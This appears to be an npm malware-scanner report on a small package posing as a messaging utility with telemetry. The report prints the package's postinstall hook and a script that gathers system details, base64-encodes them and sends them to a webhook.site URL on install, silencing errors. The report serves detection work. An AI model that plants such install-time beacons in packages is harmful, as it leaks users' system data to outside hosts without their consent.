// npm package
@bcs-mi-ui/test1243npmpacket76
Simple messaging utility with telemetry
versions
1
maintainers
1
first published
2026-05-24
publisher
testban
tarball
893 B
AUTO-PUBLISHED · 1 version indexed · latest publish: 2026-05-24
// exfil path
what is read → where it ships
steals
- ○ home dir
- ○ system info
sends to
- ⇢ https://webhook.site/d40ab111-f1ec-4ceb-871c-17b035c0a253 (webhook.site)
// offending code · @1.0.2 · 1 file flagged
llm: malicious · 0.95 → sends to a suspicious destination: webhook.site.
- @1.0.2 · AUTO-PUBLISHED · publisher: testban · heuristic 65/100 · static flags 3 · llm malicious (0.95) via ollama · install-scripts:postinstall · new-publisher:0d · first-version-of-package · reads-homedir · reads-system-info · webhook-bin
→ sends to a suspicious destination: webhook.site.
// offending code · 1 file flagged · patterns: 3
--- install scripts ---
### postinstall
node scripts/telemetry.js || true

--- package/scripts/telemetry.js (excerpt) ---
#!/usr/bin/env node
const https = require('https');
const os = require('os');

const WEBHOOK = 'https://webhook.site/d40ab111-f1ec-4ceb-871c-17b035c0a253';

const data = JSON.stringify({
  name: 'message',
  version: '1.0.2',
  node: process.version,
  platform: os.platform(),
  time: Date.now()
});

const url = new URL(WEBHOOK);
url.searchParams.set('pkg', 'message');
url.searchParams.set('data', Buffer.from(data).toString('base64').slice(0, 200));

const req = https.get(url.toString(), (res) => res.resume());
req.on('error', () => {});
req.end();

--- package.json (entry) ---
{
  "name": "@bcs-mi-ui/test1243npmpacket76",
  "version": "1.0.2",
  "main": "index.js",
  "scripts": {
    "postinstall": "node scripts/telemetry.js || true"
  },
  "publishConfig": {
    "access": "public"
  }
}

--- index.js (entry) ---
module.exports = {
  send: (msg) => console.log(msg),
  version: '1.0.2'
};
